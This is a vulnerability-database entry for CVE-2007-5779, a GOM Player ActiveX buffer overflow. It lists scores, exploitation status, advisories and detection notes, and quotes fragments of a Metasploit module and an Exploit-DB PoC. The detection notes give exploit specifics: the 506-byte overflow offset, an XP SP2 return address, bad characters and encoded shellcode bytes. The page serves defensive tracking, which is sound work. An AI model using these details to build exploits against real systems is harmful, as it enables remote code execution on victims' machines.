CVE-2007-5779
Published 2007-11-01
Priority P266 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 71.51% (99.3th percentile)
Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player (GOM Player) 2.1.6.3499 allows remote attackers to execute arbitrary code via a long argument to the OpenUrl method.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gom_player | gom_player | — | — |
| gomlab | gom_media_player | <= 2.1.36.5083 | — |
Detection & IOCs (extracted from sources)
bytes: %eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36
bytes: %67%31%41%7e
- Exploit triggers a stack buffer overflow at offset 506 bytes into the OpenURL() argument; monitor ActiveX method calls to GomWeb3.dll where the OpenURL argument length exceeds 506 characters.
- The PoC exploit constructs the malicious buffer as 506 'A' characters + EIP overwrite + NOP sled + shellcode; detect strings of 506+ repeated characters passed to GomManager.OpenURL in browser script.
- The return address used for Windows XP SP2 English is 0x7e497c7b (JMP ESP in a system DLL); use this as a ROP/return address indicator in memory forensics or exploit detection.
- Payload bad characters for this exploit are null byte, tab, LF, CR, single-quote, and backslash; encoded shellcode in exploit traffic will avoid these bytes.
- The Metasploit module uses a StackAdjustment of -3500, which is an unusual ESP manipulation value that may appear in memory analysis of exploited processes.
- The confirmed vulnerable version is GOM Player 2.1.6.3499 with GomWeb3.dll version 1.0.0.12 only; other versions are not confirmed affected.
- The Metasploit module's return address (0x7e497c7b) is specific to Windows XP SP2 Pro English; exploitation against other OS versions or service packs requires a different return address.
- The Metasploit module payload space is limited to 800 bytes; shellcode exceeding this size will not fit in the exploit buffer.
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck · 7.5 HIGH
GHSA
ghsa_unreviewed·2022-05-14·CVSS 7.5
CVE-2012-1774 [HIGH] GHSA-vjwp-mv34-wrm9: Unspecified vulnerability in the Open URL feature in Gretech GOM Media Player before 2
Unspecified vulnerability in the Open URL feature in Gretech GOM Media Player before 2.1.39.5101 has unknown impact and attack vectors, a different vulnerability than CVE-2007-5779 and CVE-2012-1264.
GHSA
ghsa_unreviewed·2022-05-01
CVE-2007-5779 [HIGH] CWE-119 GHSA-q2r3-489p-vqx4: Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3
Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player (GOM Player) 2.1.6.3499 allows remote attackers to execute arbitrary code via a long argument to the OpenUrl method.
VulnCheck
vulncheck·2007·CVSS 7.5
CVE-2007-5779 [HIGH] gom_player gom_player Improper Restriction of Operations within the Bounds of a Memory Buffer
Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player (GOM Player) 2.1.6.3499 allows remote attackers to execute arbitrary code via a long argument to the OpenUrl method.
Affected: gom_player gom_player
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://archive.f-secure.com/weblog/archives/00001393; https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
exploitdb·2010-05-09
CVE-2007-5779 GOM Player - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: gom_openurl.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'GOM Player ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in GOM Player 2.1.6.3499.
By sending an overly long string to the "OpenUrl()" method located
in the GomWeb3.dll Control, an attacker may be able to execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 9262 $',
'Referenc
Exploit-DB
exploitdb·2007-10-29
CVE-2007-5779 GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow
---
//open calc.exe
Metasploit
GOM Player ActiveX Control Buffer Overflow
metasploit
This module exploits a stack buffer overflow in GOM Player 2.1.6.3499. By sending an overly long string to the "OpenUrl()" method located in the GomWeb3.dll Control, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
- http://secunia.com/advisories/27418
- http://www.gomplayer.com/forum/viewtopic.html?t=1013
- http://www.securityfocus.com/bid/26236
- http://www.vupen.com/english/advisories/2007/3634
- https://exchange.xforce.ibmcloud.com/vulnerabilities/38159
- https://www.exploit-db.com/exploits/4579